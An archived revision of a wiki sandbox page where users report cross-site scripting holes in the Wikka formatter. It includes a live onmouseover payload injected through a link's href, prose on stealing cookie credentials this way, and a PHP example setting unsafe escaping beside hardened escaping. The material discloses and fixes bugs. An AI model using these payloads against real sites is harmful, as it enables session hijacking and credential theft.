Revision [13535]
This is an old revision of SandBox made by 24.4.117.21 on 2006-03-17 13:33:02.
Test your formatting skills here
See also:
Note: this server is configured to use a western charset encoding (ISO-8859-1). This results in non-western characters being stored as unicode entities and displayed as such in the edit screen. To learn more on different charset support, please refer to WikkaLocalization.
Read this first- New to Wikka? Start WelcomeUser here.
You are free to play with Wikka's FormattingRules syntax on this page. Double click anywhere to open the edit screen.
Please do not remove the main header and this paragraph while editing the page and start editing under the horizontal rule BELOW
yeah
Please make sure that the server has write access to a folder named uploads.
hello test
www.google.de google
WikiPedia
Testing
This life is one of the best. But what are the others like? Testing
Testing
<include iostream>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include "glm.h"
typedef struct _cell {
    int id;
    int x, y;
    float min, max;
    float value;
    float step;
    char* info;
    char* format;
} cell;
http://www.qwerty.com
HomePage
mailtop:[email protected]
"onmouseover="alert(String.fromCharCode(73,32,99,97,110,32,114,117,110,32,74,97,118,97,83,99,114,105,112,116,44,32,97,32,98,97,100,32,116,104,105,110,103))" move your mouse over this. To disallow this insert the following line into /formatters/wakka.php after line 251:
For info contact me at sakaru [at] gmail [dot] com
www.yahoo.com.br yahoo sandbox
Note how one has access to anything on the page... sakaru made a good point here! Mouseover the "interesting".
"id="q" Hello
The two below work together to do something annoying
Another bug (which as far as I know isn't a security hole like the previous example) is shown here
This can be fixed by entering the following line after line 989 in /wikka.php
This can't be used to run JS because the / in the closing tag gets escaped.
Similarly wikipage/Index/<xmp> also displays the bug. The best solution I found for this was this line after line 1174 in /wikka.php
It's not really that neat a solution, but it works.
I just realised that there is in fact a bug reporting page. I'll leave it to someone else to migrate these comments over.
Thanks for the info. Because cookies are used for username and password, one could access those cookies with JS and then use AJAX to send that info elsewhere, all with the HREF hole above.
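The entries above work because a double quote in the link target closes the href attribute and the rest is parsed as new attributes. As an added example (not Wikka's code and not the line the poster refers to; render_link_unsafe and render_link_safe are hypothetical names, and the inputs are constructed), here is the unescaped form beside one that allowlists URL schemes and HTML-escapes the value:

```php
<?php
// Added example: a hypothetical link renderer, not Wikka's actual formatter.

// Unescaped form: the target is concatenated straight into the attribute,
// so a double quote in the input ends href and starts a new attribute.
function render_link_unsafe(string $url, string $text): string
{
    return '<a href="' . $url . '">' . $text . '</a>';
}

// Hardened form: accept only known schemes, then HTML-escape both values
// so quotes and angle brackets stay inside the attribute or the text node.
function render_link_safe(string $url, string $text): string
{
    $label = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    if (!preg_match('#^(https?|ftp|mailto):#i', $url)) {
        return $label; // no recognised scheme: emit plain text, no anchor
    }
    $href = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    return '<a href="' . $href . '">' . $label . '</a>';
}

// Constructed inputs: the first has the scheme-less shape of the sandbox
// entries, the second passes the scheme check but still carries a quote.
$samples = [
    '"onmouseover="alert(1)',
    'http://example.org/"onmouseover="alert(1)',
];

foreach ($samples as $url) {
    echo "input : ", $url, "\n";
    echo "unsafe: ", render_link_unsafe($url, 'move your mouse over this'), "\n";
    echo "safe  : ", render_link_safe($url, 'move your mouse over this'), "\n\n";
}
```

In the safe output the quote appears as `&quot;`, so the browser sees a single href value and no event-handler attribute.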